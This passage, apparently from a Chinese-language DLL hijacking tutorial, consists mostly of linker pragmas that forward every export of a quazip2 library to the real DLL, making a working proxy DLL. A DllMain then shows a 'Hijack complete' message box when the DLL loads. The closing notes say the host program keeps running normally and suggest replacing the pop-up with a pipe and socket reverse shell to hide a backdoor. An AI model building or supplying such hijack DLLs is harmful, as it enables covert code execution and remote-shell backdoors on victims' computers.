#pragma comment(linker,"/EXPORT:?metaObject@QuaGzipFile@@UEBAPEBUQMetaObject@@XZ=quazip2.?metaObject@QuaGzipFile@@UEBAPEBUQMetaObject@@XZ,@135")
#pragma comment(linker,"/EXPORT:?metaObject@QuaZIODevice@@UEBAPEBUQMetaObject@@XZ=quazip2.?metaObject@QuaZIODevice@@UEBAPEBUQMetaObject@@XZ,@136")
#pragma comment(linker,"/EXPORT:?metaObject@QuaZipFile@@UEBAPEBUQMetaObject@@XZ=quazip2.?metaObject@QuaZipFile@@UEBAPEBUQMetaObject@@XZ,@137")
#pragma comment(linker,"/EXPORT:?nameFilters@QuaZipDir@@QEBA?AVQStringList@@XZ=quazip2.?nameFilters@QuaZipDir@@QEBA?AVQStringList@@XZ,@138")
#pragma comment(linker,"/EXPORT:?open@QuaGzipFile@@UEAA_NHV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaGzipFile@@UEAA_NHV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@139")
#pragma comment(linker,"/EXPORT:?open@QuaGzipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaGzipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@140")
#pragma comment(linker,"/EXPORT:?open@QuaZIODevice@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaZIODevice@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@141")
#pragma comment(linker,"/EXPORT:?open@QuaZip@@QEAA_NW4Mode@1@PEAUzlib_filefunc_def_s@@@Z=quazip2.?open@QuaZip@@QEAA_NW4Mode@1@PEAUzlib_filefunc_def_s@@@Z,@142")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@AEBUQuaZipNewInfo@@PEBDIHH_NHHH@Z=quazip2.?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@AEBUQuaZipNewInfo@@PEBDIHH_NHHH@Z,@143")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEAH1_NPEBD@Z=quazip2.?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEAH1_NPEBD@Z,@144")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEBD@Z=quazip2.?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEBD@Z,@145")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaZipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@146")
#pragma comment(linker,"/EXPORT:?path@QuaZipDir@@QEBA?AVQString@@XZ=quazip2.?path@QuaZipDir@@QEBA?AVQString@@XZ,@147")
#pragma comment(linker,"/EXPORT:?pos@QuaZipFile@@UEBA_JXZ=quazip2.?pos@QuaZipFile@@UEBA_JXZ,@148")
#pragma comment(linker,"/EXPORT:?qt_metacall@QuaGzipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_metacall@QuaGzipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z,@149")
#pragma comment(linker,"/EXPORT:?qt_metacall@QuaZIODevice@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_metacall@QuaZIODevice@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z,@150")
#pragma comment(linker,"/EXPORT:?qt_metacall@QuaZipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_metacall@QuaZipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z,@151")
#pragma comment(linker,"/EXPORT:?qt_metacast@QuaGzipFile@@UEAAPEAXPEBD@Z=quazip2.?qt_metacast@QuaGzipFile@@UEAAPEAXPEBD@Z,@152")
#pragma comment(linker,"/EXPORT:?qt_metacast@QuaZIODevice@@UEAAPEAXPEBD@Z=quazip2.?qt_metacast@QuaZIODevice@@UEAAPEAXPEBD@Z,@153")
#pragma comment(linker,"/EXPORT:?qt_metacast@QuaZipFile@@UEAAPEAXPEBD@Z=quazip2.?qt_metacast@QuaZipFile@@UEAAPEAXPEBD@Z,@154")
#pragma comment(linker,"/EXPORT:?qt_static_metacall@QuaGzipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_static_metacall@QuaGzipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z,@155")
#pragma comment(linker,"/EXPORT:?qt_static_metacall@QuaZIODevice@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_static_metacall@QuaZIODevice@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z,@156")
#pragma comment(linker,"/EXPORT:?qt_static_metacall@QuaZipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_static_metacall@QuaZipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z,@157")
#pragma comment(linker,"/EXPORT:?readData@QuaGzipFile@@MEAA_JPEAD_J@Z=quazip2.?readData@QuaGzipFile@@MEAA_JPEAD_J@Z,@158")
#pragma comment(linker,"/EXPORT:?readData@QuaZIODevice@@MEAA_JPEAD_J@Z=quazip2.?readData@QuaZIODevice@@MEAA_JPEAD_J@Z,@159")
#pragma comment(linker,"/EXPORT:?readData@QuaZipFile@@MEAA_JPEAD_J@Z=quazip2.?readData@QuaZipFile@@MEAA_JPEAD_J@Z,@160")
#pragma comment(linker,"/EXPORT:?relativeFilePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z=quazip2.?relativeFilePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z,@161")
#pragma comment(linker,"/EXPORT:?removeFile@JlCompress@@CA_NVQStringList@@@Z=quazip2.?removeFile@JlCompress@@CA_NVQStringList@@@Z,@162")
#pragma comment(linker,"/EXPORT:?reset@QuaAdler32@@UEAAXXZ=quazip2.?reset@QuaAdler32@@UEAAXXZ,@163")
#pragma comment(linker,"/EXPORT:?reset@QuaCrc32@@UEAAXXZ=quazip2.?reset@QuaCrc32@@UEAAXXZ,@164")
#pragma comment(linker,"/EXPORT:?setAutoClose@QuaZip@@QEBAX_N@Z=quazip2.?setAutoClose@QuaZip@@QEBAX_N@Z,@165")
#pragma comment(linker,"/EXPORT:?setCaseSensitivity@QuaZipDir@@QEAAXW4CaseSensitivity@QuaZip@@@Z=quazip2.?setCaseSensitivity@QuaZipDir@@QEAAXW4CaseSensitivity@QuaZip@@@Z,@166")
#pragma comment(linker,"/EXPORT:?setComment@QuaZip@@QEAAXAEBVQString@@@Z=quazip2.?setComment@QuaZip@@QEAAXAEBVQString@@@Z,@167")
#pragma comment(linker,"/EXPORT:?setCommentCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z=quazip2.?setCommentCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z,@168")
#pragma comment(linker,"/EXPORT:?setCommentCodec@QuaZip@@QEAAXPEBD@Z=quazip2.?setCommentCodec@QuaZip@@QEAAXPEBD@Z,@169")
#pragma comment(linker,"/EXPORT:?setCurrentFile@QuaZip@@QEAA_NAEBVQString@@W4CaseSensitivity@1@@Z=quazip2.?setCurrentFile@QuaZip@@QEAA_NAEBVQString@@W4CaseSensitivity@1@@Z,@170")
#pragma comment(linker,"/EXPORT:?setDataDescriptorWritingEnabled@QuaZip@@QEAAX_N@Z=quazip2.?setDataDescriptorWritingEnabled@QuaZip@@QEAAX_N@Z,@171")
#pragma comment(linker,"/EXPORT:?setDefaultFileNameCodec@QuaZip@@SAXPEAVQTextCodec@@@Z=quazip2.?setDefaultFileNameCodec@QuaZip@@SAXPEAVQTextCodec@@@Z,@172")
#pragma comment(linker,"/EXPORT:?setDefaultFileNameCodec@QuaZip@@SAXPEBD@Z=quazip2.?setDefaultFileNameCodec@QuaZip@@SAXPEBD@Z,@173")
#pragma comment(linker,"/EXPORT:?setFileDateTime@QuaZipNewInfo@@QEAAXAEBVQString@@@Z=quazip2.?setFileDateTime@QuaZipNewInfo@@QEAAXAEBVQString@@@Z,@174")
#pragma comment(linker,"/EXPORT:?setFileNTFSTimes@QuaZipNewInfo@@QEAAXAEBVQString@@@Z=quazip2.?setFileNTFSTimes@QuaZipNewInfo@@QEAAXAEBVQString@@@Z,@175")
#pragma comment(linker,"/EXPORT:?setFileNTFSaTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z=quazip2.?setFileNTFSaTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z,@176")
#pragma comment(linker,"/EXPORT:?setFileNTFScTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z=quazip2.?setFileNTFScTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z,@177")
#pragma comment(linker,"/EXPORT:?setFileNTFSmTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z=quazip2.?setFileNTFSmTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z,@178")
#pragma comment(linker,"/EXPORT:?setFileName@QuaGzipFile@@QEAAXAEBVQString@@@Z=quazip2.?setFileName@QuaGzipFile@@QEAAXAEBVQString@@@Z,@179")
#pragma comment(linker,"/EXPORT:?setFileName@QuaZipFile@@QEAAXAEBVQString@@W4CaseSensitivity@QuaZip@@@Z=quazip2.?setFileName@QuaZipFile@@QEAAXAEBVQString@@W4CaseSensitivity@QuaZip@@@Z,@180")
#pragma comment(linker,"/EXPORT:?setFileNameCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z=quazip2.?setFileNameCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z,@181")
#pragma comment(linker,"/EXPORT:?setFileNameCodec@QuaZip@@QEAAXPEBD@Z=quazip2.?setFileNameCodec@QuaZip@@QEAAXPEBD@Z,@182")
#pragma comment(linker,"/EXPORT:?setFilePermissions@QuaZipNewInfo@@QEAAXAEBVQString@@@Z=quazip2.?setFilePermissions@QuaZipNewInfo@@QEAAXAEBVQString@@@Z,@183")
#pragma comment(linker,"/EXPORT:?setFilter@QuaZipDir@@QEAAXV?$QFlags@W4Filter@QDir@@@@@Z=quazip2.?setFilter@QuaZipDir@@QEAAXV?$QFlags@W4Filter@QDir@@@@@Z,@184")
#pragma comment(linker,"/EXPORT:?setIoDevice@QuaZip@@QEAAXPEAVQIODevice@@@Z=quazip2.?setIoDevice@QuaZip@@QEAAXPEAVQIODevice@@@Z,@185")
#pragma comment(linker,"/EXPORT:?setNameFilters@QuaZipDir@@QEAAXAEBVQStringList@@@Z=quazip2.?setNameFilters@QuaZipDir@@QEAAXAEBVQStringList@@@Z,@186")
#pragma comment(linker,"/EXPORT:?setPath@QuaZipDir@@QEAAXAEBVQString@@@Z=quazip2.?setPath@QuaZipDir@@QEAAXAEBVQString@@@Z,@187")
#pragma comment(linker,"/EXPORT:?setPermissions@QuaZipNewInfo@@QEAAXV?$QFlags@W4Permission@QFileDevice@@@@@Z=quazip2.?setPermissions@QuaZipNewInfo@@QEAAXV?$QFlags@W4Permission@QFileDevice@@@@@Z,@188")
#pragma comment(linker,"/EXPORT:?setSorting@QuaZipDir@@QEAAXV?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?setSorting@QuaZipDir@@QEAAXV?$QFlags@W4SortFlag@QDir@@@@@Z,@189")
#pragma comment(linker,"/EXPORT:?setZip64Enabled@QuaZip@@QEAAX_N@Z=quazip2.?setZip64Enabled@QuaZip@@QEAAX_N@Z,@190")
#pragma comment(linker,"/EXPORT:?setZip@QuaZipFile@@QEAAXPEAVQuaZip@@@Z=quazip2.?setZip@QuaZipFile@@QEAAXPEAVQuaZip@@@Z,@191")
#pragma comment(linker,"/EXPORT:?setZipName@QuaZip@@QEAAXAEBVQString@@@Z=quazip2.?setZipName@QuaZip@@QEAAXAEBVQString@@@Z,@192")
#pragma comment(linker,"/EXPORT:?setZipName@QuaZipFile@@QEAAXAEBVQString@@@Z=quazip2.?setZipName@QuaZipFile@@QEAAXAEBVQString@@@Z,@193")
#pragma comment(linker,"/EXPORT:?size@QuaZipFile@@UEBA_JXZ=quazip2.?size@QuaZipFile@@UEBA_JXZ,@194")
#pragma comment(linker,"/EXPORT:?sorting@QuaZipDir@@QEBA?AV?$QFlags@W4SortFlag@QDir@@@@XZ=quazip2.?sorting@QuaZipDir@@QEBA?AV?$QFlags@W4SortFlag@QDir@@@@XZ,@195")
#pragma comment(linker,"/EXPORT:?staticMetaObject@QuaGzipFile@@2UQMetaObject@@B=quazip2.?staticMetaObject@QuaGzipFile@@2UQMetaObject@@B,@196")
#pragma comment(linker,"/EXPORT:?staticMetaObject@QuaZIODevice@@2UQMetaObject@@B=quazip2.?staticMetaObject@QuaZIODevice@@2UQMetaObject@@B,@197")
#pragma comment(linker,"/EXPORT:?staticMetaObject@QuaZipFile@@2UQMetaObject@@B=quazip2.?staticMetaObject@QuaZipFile@@2UQMetaObject@@B,@198")
#pragma comment(linker,"/EXPORT:?toQuaZipFileInfo@QuaZipFileInfo64@@QEBA_NAEAUQuaZipFileInfo@@@Z=quazip2.?toQuaZipFileInfo@QuaZipFileInfo64@@QEBA_NAEAUQuaZipFileInfo@@@Z,@199")
#pragma comment(linker,"/EXPORT:?tr@QuaGzipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?tr@QuaGzipFile@@SA?AVQString@@PEBD0H@Z,@200")
#pragma comment(linker,"/EXPORT:?tr@QuaZIODevice@@SA?AVQString@@PEBD0H@Z=quazip2.?tr@QuaZIODevice@@SA?AVQString@@PEBD0H@Z,@201")
#pragma comment(linker,"/EXPORT:?tr@QuaZipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?tr@QuaZipFile@@SA?AVQString@@PEBD0H@Z,@202")
#pragma comment(linker,"/EXPORT:?trUtf8@QuaGzipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?trUtf8@QuaGzipFile@@SA?AVQString@@PEBD0H@Z,@203")
#pragma comment(linker,"/EXPORT:?trUtf8@QuaZIODevice@@SA?AVQString@@PEBD0H@Z=quazip2.?trUtf8@QuaZIODevice@@SA?AVQString@@PEBD0H@Z,@204")
#pragma comment(linker,"/EXPORT:?trUtf8@QuaZipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?trUtf8@QuaZipFile@@SA?AVQString@@PEBD0H@Z,@205")
#pragma comment(linker,"/EXPORT:?update@QuaAdler32@@UEAAXAEBVQByteArray@@@Z=quazip2.?update@QuaAdler32@@UEAAXAEBVQByteArray@@@Z,@206")
#pragma comment(linker,"/EXPORT:?update@QuaCrc32@@UEAAXAEBVQByteArray@@@Z=quazip2.?update@QuaCrc32@@UEAAXAEBVQByteArray@@@Z,@207")
#pragma comment(linker,"/EXPORT:?usize@QuaZipFile@@QEBA_JXZ=quazip2.?usize@QuaZipFile@@QEBA_JXZ,@208")
#pragma comment(linker,"/EXPORT:?value@QuaAdler32@@UEAAIXZ=quazip2.?value@QuaAdler32@@UEAAIXZ,@209")
#pragma comment(linker,"/EXPORT:?value@QuaCrc32@@UEAAIXZ=quazip2.?value@QuaCrc32@@UEAAIXZ,@210")
#pragma comment(linker,"/EXPORT:?writeData@QuaGzipFile@@MEAA_JPEBD_J@Z=quazip2.?writeData@QuaGzipFile@@MEAA_JPEBD_J@Z,@211")
#pragma comment(linker,"/EXPORT:?writeData@QuaZIODevice@@MEAA_JPEBD_J@Z=quazip2.?writeData@QuaZIODevice@@MEAA_JPEBD_J@Z,@212")
#pragma comment(linker,"/EXPORT:?writeData@QuaZipFile@@MEAA_JPEBD_J@Z=quazip2.?writeData@QuaZipFile@@MEAA_JPEBD_J@Z,@213")
BOOL APIENTRY DllMain
(
HMODULE hModule,
DWORD urfc,
LPVOID lpReserved
)
{
switch (urfc)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL, LPCSTR("劫持完成"), LPCSTR("Hijack"), MB_OK);
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
default:
break;
}
return TRUE;
}
编译时要注意程序到底是x86还是x64的,位数不一样可能会导致dll库无法被加载
效果图
运行程序后先弹出
然后程序正常运行
如果我们将DLL_PROCESS_ATTACH
下的代码改成开启一个管道并且开启socket通讯执行反弹shell就能很好的隐藏运行这个后门。